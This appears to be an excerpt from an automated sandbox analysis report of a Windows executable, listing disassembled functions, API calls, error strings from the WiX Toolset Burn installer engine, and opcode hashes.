                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041D2E6
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041D432
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 2528220319-4266522734
                                                                                                                                                          • Opcode ID: db83e1788a7f0bfd3f5b6237737e8782c360b98bfefc65c5ecadcf91edcf7358
                                                                                                                                                          • Instruction ID: 6bdb4caa7bcc6f723cd6b4609e4c0e55593c02e0b0169ca98780fbfbc8089e11
                                                                                                                                                          • Opcode Fuzzy Hash: db83e1788a7f0bfd3f5b6237737e8782c360b98bfefc65c5ecadcf91edcf7358
                                                                                                                                                          • Instruction Fuzzy Hash: 1641EA72A40255BBDF226E94CC46FEF3E29EB45B20F11011AFE14791D1D2BDC86097AD
                                                                                                                                                          Function 004069E7 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 130COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 00406A29
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406A35
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get max length of input buffer., xrefs: 00406A0C
                                                                                                                                                          • Failed to get system wow64 directory path with default size., xrefs: 00406A65
                                                                                                                                                          • Failed to get system wow64 directory path with returned size., xrefs: 00406B00
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00406A59, 00406A5F, 00406A70, 00406AF5, 00406AFA, 00406B36
                                                                                                                                                          • Failed to realloc system wow64 directory path., xrefs: 00406AB2
                                                                                                                                                          • Failed to terminate system wow64 directory path with backslash., xrefs: 00406B27
                                                                                                                                                          • Failed to allocate space for system wow64 directory., xrefs: 00406A8B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryErrorLastSystemWow64
                                                                                                                                                          • String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 1255099494-3585685225
                                                                                                                                                          • Opcode ID: 2dbe3bd4be10e6bdde409f58cede6832cc86863ae2d9a9743c3cb199efd911bc
                                                                                                                                                          • Instruction ID: fecc8043bf5c04773a04c9a1df35ed23b0e6571595df03d9ba51ec75778b7d20
                                                                                                                                                          • Opcode Fuzzy Hash: 2dbe3bd4be10e6bdde409f58cede6832cc86863ae2d9a9743c3cb199efd911bc
                                                                                                                                                          • Instruction Fuzzy Hash: 613106B2B8073173E73166458C49F6B2968DB41B60F138176BA06BB2C1E57C9C1086ED
                                                                                                                                                          Function 00406884 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 128COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004068C6
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00401946,?,?,00000000,?,?,?,00401925,?,00000000,00000000,?), ref: 004068D2
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate space for system directory., xrefs: 00406928
                                                                                                                                                          • Failed to get system directory path with returned size., xrefs: 0040699C
                                                                                                                                                          • Failed to get max length of input buffer., xrefs: 004068A9
                                                                                                                                                          • Failed to get system directory path with default size., xrefs: 00406902
                                                                                                                                                          • Failed to realloc system directory path., xrefs: 0040694E
                                                                                                                                                          • Failed to terminate system directory path with backslash., xrefs: 004069C2
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 004068F6, 004068FC, 0040690D, 00406991, 00406996, 004069D1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryErrorLastSystem
                                                                                                                                                          • String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 3081803543-4239660824
                                                                                                                                                          • Opcode ID: 4ff10befd06974c14344a7be8e8859b2bb833e61a3d79360bbe1efbf1b352b5f
                                                                                                                                                          • Instruction ID: b3c2c8692fb92cfa496c0008e2e3880ceefd9ac42e41db7ea08de02fa384da0f
                                                                                                                                                          • Opcode Fuzzy Hash: 4ff10befd06974c14344a7be8e8859b2bb833e61a3d79360bbe1efbf1b352b5f
                                                                                                                                                          • Instruction Fuzzy Hash: 1D3105B2B8173577E72126458D4AFAB6A58CB00BA4F13407BFE05BB2D1E6BC9C1045ED
                                                                                                                                                          Function 0042C1AB Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 111threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0042C1CC
                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042C1D7
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042C1E4
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0042BDF0,?,00000000,00000000), ref: 0042C24C
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042C259
                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0042C29F
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0042C2B8
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0042C2C9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
                                                                                                                                                          • String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix\wix\src\burn\engine\uithread.cpp
                                                                                                                                                          • API String ID: 665835008-1681362092
                                                                                                                                                          • Opcode ID: 8b085b555c7b712e538ce2749eec46d96211a9e80366076acf628873d989a66f
                                                                                                                                                          • Instruction ID: bd3644c3b1314cb2e030eff6ee8321cfa37ced79fdfcde01389575528aa9dc71
                                                                                                                                                          • Opcode Fuzzy Hash: 8b085b555c7b712e538ce2749eec46d96211a9e80366076acf628873d989a66f
                                                                                                                                                          • Instruction Fuzzy Hash: B5312A76E40229FBE7119BD89D85BAFBA78AB00750F5100B7BD04F7280D6788D4087A9
                                                                                                                                                          Function 0046B767 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 192memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$AllocClearInitString
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
                                                                                                                                                          • API String ID: 2213243845-2612819061
                                                                                                                                                          • Opcode ID: 5f8b97d621b77ae921f8632bc8a519700fe904b81237e10cf8901d0c8f235d6e
                                                                                                                                                          • Instruction ID: c9d56f9f365576a1a789e05b13610cd06c861a3abde34ffcf5a3eb2e68c91cf0
                                                                                                                                                          • Opcode Fuzzy Hash: 5f8b97d621b77ae921f8632bc8a519700fe904b81237e10cf8901d0c8f235d6e
                                                                                                                                                          • Instruction Fuzzy Hash: 0551F235B40215ABDB119F64CC49F6E3769EF85B10F11406AFE05FB290EBB899408BDA
                                                                                                                                                          Function 0046F530 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 187registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,-80000001,00000000,00000000,004221A7), ref: 0046F6F0
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,-80000001,00000000,00000000,004221A7), ref: 0046F703
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0046F5BD
                                                                                                                                                          • Failed to add the dependent key "%ls" to the string array., xrefs: 0046F725
                                                                                                                                                          • Failed to enumerate the dependents key of "%ls"., xrefs: 0046F74D
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F56F, 0046F66D, 0046F75C
                                                                                                                                                          • Failed to open the registry key for dependents of "%ls"., xrefs: 0046F612
                                                                                                                                                          • Failed to get the name of the dependent from the key "%ls"., xrefs: 0046F739
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F560
                                                                                                                                                          • Failed to check the dictionary of ignored dependents., xrefs: 0046F65E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$lstrlen
                                                                                                                                                          • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 1752758355-1257772225
                                                                                                                                                          • Opcode ID: 73cdbc52bee6e4cd7de7f6aadf28e81fbe2c8d9fdc97301b8458bca27224bfea
                                                                                                                                                          • Instruction ID: 5dcaf32bd08c2c7a98abcf54ab1bca8d303b1e020c4f5224fd66d55cd95aee90
                                                                                                                                                          • Opcode Fuzzy Hash: 73cdbc52bee6e4cd7de7f6aadf28e81fbe2c8d9fdc97301b8458bca27224bfea
                                                                                                                                                          • Instruction Fuzzy Hash: A351F332D40229FBEB22AA90DC06FAF7A649B00715F114132F941B91E1E37C4E55DA9B
                                                                                                                                                          Function 0046FBA1 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 167registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,000000B0,00000000,00020006,00000000,00000000,00000000,00000001,00000000,000000B0,?,00000000,00000000), ref: 0046FD4C
                                                                                                                                                          • RegCloseKey.ADVAPI32(000000B0,00000000,00000001,00000000,000000B0,00000000,00020006,00000000,00000000,00000000,00000001,00000000,000000B0,?,00000000,00000000), ref: 0046FD6A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set the %ls registry value to "%ls"., xrefs: 0046FCC2, 0046FCF3
                                                                                                                                                          • Failed to set the %ls registry value to %d., xrefs: 0046FD27
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046FBDE, 0046FC90, 0046FD36
                                                                                                                                                          • %ls\%ls, xrefs: 0046FC33
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046FBCF
                                                                                                                                                          • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 0046FC4D
                                                                                                                                                          • Failed to create the dependency subkey "%ls"., xrefs: 0046FC81
                                                                                                                                                          • Failed to create the dependency registry key "%ls"., xrefs: 0046FC16
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$lstrlen
                                                                                                                                                          • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 1752758355-610600026
                                                                                                                                                          • Opcode ID: 9c4ef1289bbcc281a2bf2f48b18d95763f2b96d831e9074dd405e2af35e76883
                                                                                                                                                          • Instruction ID: c5c933ddd0a7aa06a163a3a1a8848142e0c4916e2f5e4dba23978b7cbbc66bcb
                                                                                                                                                          • Opcode Fuzzy Hash: 9c4ef1289bbcc281a2bf2f48b18d95763f2b96d831e9074dd405e2af35e76883
                                                                                                                                                          • Instruction Fuzzy Hash: B851BF72E40219BBEF225F81DC46FAF7F39AB05754F11012AFA01751A0E3789A20DB5A
                                                                                                                                                          Function 004687C5 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 159stringregistryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,000000B0,00000000,00000000,00000001,?,?,?,?,00000000,?,?,00421F73), ref: 004687F9
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000001,00000000,?,00000001,BundleUpgradeCode,00000000), ref: 00468882
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,00000000,?,?,00421F73,?,00000001,?), ref: 0046890B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0046893B
                                                                                                                                                          • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 00468837
                                                                                                                                                          • BundleUpgradeCode, xrefs: 004687DA
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00468846, 004688E7, 0046892F, 00468934, 0046894A
                                                                                                                                                          • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 00468826
                                                                                                                                                          • failed to copy string: %ls, xrefs: 004688D8
                                                                                                                                                          • Failed to get total string size in bytes, xrefs: 004688C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen$Value
                                                                                                                                                          • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                          • API String ID: 198323757-2606691585
                                                                                                                                                          • Opcode ID: a631047de076b8a430b1d60ad74cd235b81ee2898a5ffdeee05f849be32ac03b
                                                                                                                                                          • Instruction ID: 9f2f58a495da3ac94f04f3d15cb9a473812a99eec76083a7adcda229eec7b145
                                                                                                                                                          • Opcode Fuzzy Hash: a631047de076b8a430b1d60ad74cd235b81ee2898a5ffdeee05f849be32ac03b
                                                                                                                                                          • Instruction Fuzzy Hash: 8441C571A40315BBEB11EE55CC4AF6F7769EB85701F11016FFA00BB2C1FA789901876A
                                                                                                                                                          Function 00421AFB Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,log,000000FF,000000B0,8000FFFF,00000000,?,00000000,00000001,8000FFFF,00000000,000000B0,00000000), ref: 00421B9C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,00486CB8,000000FF), ref: 00421BC1
                                                                                                                                                          Strings
                                                                                                                                                          • -log "[%ls]", xrefs: 00421BDC
                                                                                                                                                          • log, xrefs: 00421B8E
                                                                                                                                                          • Failed creating log argument, xrefs: 00421BF0
                                                                                                                                                          • Failed to format argument string., xrefs: 00421C1F
                                                                                                                                                          • Failed concatenating '-log' to obfuscated command line, xrefs: 00421C71
                                                                                                                                                          • Failed parsing command line, xrefs: 00421B4B
                                                                                                                                                          • Failed concatenating '-log' to command line, xrefs: 00421C48
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00421B5D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: -log "[%ls]"$Failed concatenating '-log' to command line$Failed concatenating '-log' to obfuscated command line$Failed creating log argument$Failed parsing command line$Failed to format argument string.$d:\a\wix\wix\src\burn\engine\core.cpp$log
                                                                                                                                                          • API String ID: 1825529933-1020064687
                                                                                                                                                          • Opcode ID: 0933f6da78bf70001da1f05a20ca5b6c5332a976fc4dd4588de9f8cafd68a626
                                                                                                                                                          • Instruction ID: 36924d55256fff67e9e5b69b5f94727d6f1691683f0e611af2ffcb45fc4f1415
                                                                                                                                                          • Opcode Fuzzy Hash: 0933f6da78bf70001da1f05a20ca5b6c5332a976fc4dd4588de9f8cafd68a626
                                                                                                                                                          • Instruction Fuzzy Hash: B741D435B80234B6DB219E85DC46F9F7A74EB11711F510267FA15BB2E0D678A940C788
                                                                                                                                                          Function 004079CB Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,0040616B,?,?,?,00000000), ref: 00407A1E
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040616B,?,?,?,00000000), ref: 00407A2A
                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,0040616B,?,?,?,00000000), ref: 00407AC7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040616B,?,?,?,00000000), ref: 00407AD3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                          • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                          • API String ID: 4064601616-1301571406
                                                                                                                                                          • Opcode ID: b386e8639d9b15609583888c6a865d0ee4f60cff2c0085b57ddce0530fabd041
                                                                                                                                                          • Instruction ID: 01f642bb089f81db316f3f181cc2559917eb20a1b9cd7cac164a66d6cf4062e3
                                                                                                                                                          • Opcode Fuzzy Hash: b386e8639d9b15609583888c6a865d0ee4f60cff2c0085b57ddce0530fabd041
                                                                                                                                                          • Instruction Fuzzy Hash: 2E41DD36F8432473D73256558C49F5F3E689B41BA0F114077FA087E2D1E57CAE01CA9A
